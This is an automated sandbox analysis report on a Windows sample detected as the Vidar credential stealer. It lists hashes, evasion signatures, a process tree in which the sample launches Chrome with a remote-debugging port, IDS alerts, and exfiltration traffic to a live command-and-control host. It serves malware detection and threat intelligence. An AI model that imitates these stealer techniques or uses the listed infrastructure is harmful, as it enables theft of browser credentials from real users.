Edit tour

Windows Analysis Report
random(2).exe

Overview

General Information

Sample name:random(2).exe
Analysis ID:1643067
MD5:5e941e7c271e85093cb8344fb7cab50b
SHA1:7a1f977cfd43da7dec3acfd45fcfea91f3acb76c
SHA256:51c583db2595a3aefa45efaa70c8f0cc1394c18549746bc9fe654fedb9d17e57
Tags:176-113-115-7exeuser-JAMESWT_MHT
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Attempt to bypass Chrome Application-Bound Encryption
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Vidar stealer
Hides threads from debuggers
Joe Sandbox ML detected suspicious sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Entry point lies outside standard sections
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Browser Started with Remote Debugging
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • random(2).exe (PID: 6980 cmdline: "C:\Users\user\Desktop\random(2).exe" MD5: 5E941E7C271E85093CB8344FB7CAB50B)
    • chrome.exe (PID: 7804 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: E81F54E6C1129887AEA47E7D092680BF)
      • chrome.exe (PID: 8048 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2296,i,9997688068787143346,17471011568796092826,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2464 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 3436 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 4968 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 512 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 1532 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 6768 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 4056 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000003.1130116827.0000000000B79000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
      00000000.00000003.1152734556.0000000000B76000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
        00000000.00000003.1171301147.0000000000B77000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
          Process Memory Space: random(2).exe PID: 6980JoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            Process Memory Space: random(2).exe PID: 6980JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

              System Summary

              barindex
              Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\random(2).exe", ParentImage: C:\Users\user\Desktop\random(2).exe, ParentProcessId: 6980, ParentProcessName: random(2).exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 7804, ProcessName: chrome.exe
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-19T14:00:17.957230+010020442471Malware Command and Control Activity Detected78.47.63.132443192.168.2.1049685TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-19T14:00:20.590469+010020518311Malware Command and Control Activity Detected78.47.63.132443192.168.2.1049686TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-19T14:00:20.590290+010020490871A Network Trojan was detected192.168.2.104968678.47.63.132443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-19T14:00:28.067428+010020593311Malware Command and Control Activity Detected192.168.2.104969478.47.63.132443TCP
              2025-03-19T14:02:16.338105+010020593311Malware Command and Control Activity Detected192.168.2.104969978.47.63.132443TCP
              2025-03-19T14:02:16.739083+010020593311Malware Command and Control Activity Detected192.168.2.104970078.47.63.132443TCP
              2025-03-19T14:02:17.804395+010020593311Malware Command and Control Activity Detected192.168.2.104970178.47.63.132443TCP
              2025-03-19T14:02:19.840485+010020593311Malware Command and Control Activity Detected192.168.2.104970278.47.63.132443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-19T14:02:16.739083+010028596361Malware Command and Control Activity Detected192.168.2.104970078.47.63.132443TCP
              2025-03-19T14:02:17.804395+010028596361Malware Command and Control Activity Detected192.168.2.104970178.47.63.132443TCP
              2025-03-19T14:02:19.840485+010028596361Malware Command and Control Activity Detected192.168.2.104970278.47.63.132443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-19T14:00:14.506040+010028593781Malware Command and Control Activity Detected192.168.2.104968378.47.63.132443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: random(2).exeAvira: detected
              Source: random(2).exeVirustotal: Detection: 50%Perma Link
              Source: random(2).exeReversingLabs: Detection: 58%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: random(2).exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.10:49681 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 78.47.63.132:443 -> 192.168.2.10:49682 version: TLS 1.2
              Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
              Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
              Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
              Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
              Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
              Source: C:\Users\user\Desktop\random(2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\Jump to behavior
              Source: chrome.exeMemory has grown: Private usage: 1MB later: 38MB

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.10:49683 -> 78.47.63.132:443
              Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.10:49686 -> 78.47.63.132:443
              Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.10:49700 -> 78.47.63.132:443
              Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.10:49700 -> 78.47.63.132:443
              Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.10:49694 -> 78.47.63.132:443
              Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.10:49702 -> 78.47.63.132:443
              Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.10:49702 -> 78.47.63.132:443
              Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 78.47.63.132:443 -> 192.168.2.10:49686
              Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.10:49699 -> 78.47.63.132:443
              Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.10:49701 -> 78.47.63.132:443
              Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.10:49701 -> 78.47.63.132:443
              Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 78.47.63.132:443 -> 192.168.2.10:49685
              Source: global trafficHTTP traffic detected: GET /g_etcontent HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
              Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
              Source: Joe Sandbox ViewIP Address: 78.47.63.132 78.47.63.132
              Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /g_etcontent HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0Host: y.p.formaxprime.co.ukConnection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CJe2yQEIo7bJAQipncoBCJr0ygEIlKHLAQiKo8sBCIWgzQEI/aXOAQiB1s4BCMHYzgEIydzOAQjg4M4BCOXjzgEIr+TOAQjI5M4BCN/kzgEIi+XOAQiO5c4BSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CJe2yQEIo7bJAQipncoBCJr0ygEIlKHLAQiKo8sBCIWgzQEI/aXOAQiB1s4BCMHYzgEIydzOAQjg4M4BCOXjzgEIr+TOAQjI5M4BCN/kzgEIi+XOAQiO5c4BSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: chrome.exe, 0000000C.00000003.2419053610.00003CCC00328000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <!--_html_template_end_-->`}const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends CrLitElement{constructor(){super(...arguments);this.url={url:""}}static get is(){return"ntp-doodle-share-dialog"}static get styles(){return getCss$2()}render(){return getHtml$2.bind(this)()}static get properties(){return{title:{type:String},url:{type:Object}}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.fire("share",channel)}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);let instance$3=null;function getCss$1(){return instance$3||(instance$3=[...[getCss$4()],css`:host{--ntp-logo-height:168px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#doodle{position:relative}#shareButton{background-color:var(--color-new-tab-page-doodle-share-button-background,none);border:none;height:32px;min-width:32px;padding:0;position:absolute;width:32px;bottom:0}:host-context([dir=ltr]) #shareButton{right:-40px}:host-context([dir=rtl]) #shareButton{left:-40px}#shareButtonIcon{width:18px;height:18px;margin:7px;vertical-align:bottom;mask-image:url(chrome://new-tab-page/icons/share_unfilled.svg);background-color:var(--color-new-tab-page-doodle-share-button-i
              Source: chrome.exe, 0000000C.00000003.2419053610.00003CCC00328000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <!--_html_template_end_-->`}const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends CrLitElement{constructor(){super(...arguments);this.url={url:""}}static get is(){return"ntp-doodle-share-dialog"}static get styles(){return getCss$2()}render(){return getHtml$2.bind(this)()}static get properties(){return{title:{type:String},url:{type:Object}}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.fire("share",channel)}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);let instance$3=null;function getCss$1(){return instance$3||(instance$3=[...[getCss$4()],css`:host{--ntp-logo-height:168px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#doodle{position:relative}#shareButton{background-color:var(--color-new-tab-page-doodle-share-button-background,none);border:none;height:32px;min-width:32px;padding:0;position:absolute;width:32px;bottom:0}:host-context([dir=ltr]) #shareButton{right:-40px}:host-context([dir=rtl]) #shareButton{left:-40px}#shareButtonIcon{width:18px;height:18px;margin:7px;vertical-align:bottom;mask-image:url(chrome://new-tab-page/icons/share_unfilled.svg);background-color:var(--color-new-tab-page-doodle-share-button-i
              Source: global trafficDNS traffic detected: DNS query: t.me
              Source: global trafficDNS traffic detected: DNS query: y.p.formaxprime.co.uk
              Source: global trafficDNS traffic detected: DNS query: www.google.com
              Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----90r90zuknop8ym7qiwbsUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0Host: y.p.formaxprime.co.ukContent-Length: 256Connection: Keep-AliveCache-Control: no-cache
              Source: chrome.exe, 0000000C.00000002.6037129593.00003CCC0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://clients2.google.com/time/1/current
              Source: chrome.exe, 0000000C.00000002.5846593062.00003CCC000DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://developer.chrome.com/docs/extensions/how-to/distribute/install-extensions)
              Source: chrome.exe, 0000000C.00000002.5817119523.00003CCC000A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://google.com/
              Source: chrome.exe, 0000000C.00000002.2655107307.00000249DAA8D000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://redirector.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUw
              Source: chrome.exe, 0000000C.00000002.2655107307.00000249DAA8D000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://www.google.com/update2/response
              Source: chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accountcapabilities-pa.googleapis.com/
              Source: chrome.exe, 0000000C.00000002.5785927082.00003CCC0003C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGet
              Source: chrome.exe, 0000000C.00000002.6037129593.00003CCC0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/
              Source: chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/AccountChooser
              Source: chrome.exe, 0000000C.00000002.6037129593.00003CCC0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/AddSession
              Source: chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo
              Source: chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ListAccounts?json=standard
              Source: chrome.exe, 0000000C.00000002.6037129593.00003CCC0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/Logout
              Source: chrome.exe, 0000000C.00000002.6037129593.00003CCC0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/RotateBoundCookies
              Source: chrome.exe, 0000000C.00000002.6206613229.00003CCC002D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport
              Source: chrome.exe, 0000000C.00000002.6206613229.00003CCC002D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/fine-allowlist
              Source: chrome.exe, 0000000C.00000002.6037129593.00003CCC0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/chrome/blank.html
              Source: chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/reauth/chromeos
              Source: chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/chrome/usermenu
              Source: chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/kidsignin/chromeos
              Source: chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/kidsignup/chromeos
              Source: chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/v2/chromeos
              Source: chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/windows
              Source: chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/xreauth/chrome
              Source: chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/encryption/unlock/desktop
              Source: chrome.exe, 0000000C.00000002.5829878346.00003CCC000B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxAB
              Source: chrome.exe, 0000000C.00000002.5829878346.00003CCC000B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxABata
              Source: chrome.exe, 0000000C.00000002.6037129593.00003CCC0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/o/oauth2/revoke
              Source: chrome.exe, 0000000C.00000002.6037129593.00003CCC0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/oauth/multilogin
              Source: chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/samlredirect
              Source: chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/signin/chrome/sync?ssp=1
              Source: chrome.exe, 0000000C.00000002.5877330232.00003CCC00138000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
              Source: wt26ph.0.drString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700
              Source: wt26ph.0.drString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700002.1&cta
              Source: chrome.exe, 0000000C.00000003.2419271192.00003CCC0176C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2418998130.00003CCC0174C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com
              Source: chrome.exe, 0000000C.00000003.2415297744.00003CCC01614000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
              Source: chrome.exe, 0000000C.00000002.2655346363.00000249DACD7000.00000004.08000000.00040000.00000000.sdmp, chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
              Source: chrome.exe, 0000000C.00000003.2415004575.00003CCC01544000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2415297744.00003CCC01614000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreLDDiscover
              Source: chrome.exe, 0000000C.00000003.2375705245.00003CC800514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.5727830719.00003CC80073C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
              Source: chrome.exe, 0000000C.00000003.2375705245.00003CC800514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.5727830719.00003CC80073C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
              Source: chrome.exe, 0000000C.00000003.2376583988.00003CC8005DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2376965313.00003CC8005E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
              Source: chrome.exe, 0000000C.00000003.2375705245.00003CC800514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.5727830719.00003CC80073C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
              Source: chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
              Source: chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
              Source: chrome.exe, 0000000C.00000002.6005702865.00003CCC001AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/
              Source: chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://classroom.googleapis.com/
